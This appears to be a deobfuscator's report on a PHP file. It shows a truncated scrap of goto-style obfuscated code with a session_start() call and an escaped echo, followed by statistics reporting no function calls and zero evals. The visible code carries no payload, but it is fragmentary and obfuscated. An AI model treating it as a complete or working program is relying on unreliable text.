c\76"; } goto Zd7aC; Z2nRD: session_start(); goto XRrQh; Zd7aC: ?>

Function Calls

None

Variables

None

Stats

MD5 b273e1fe4248fe3aacbdeee899631286
Eval Count 0
Decode Time 109 ms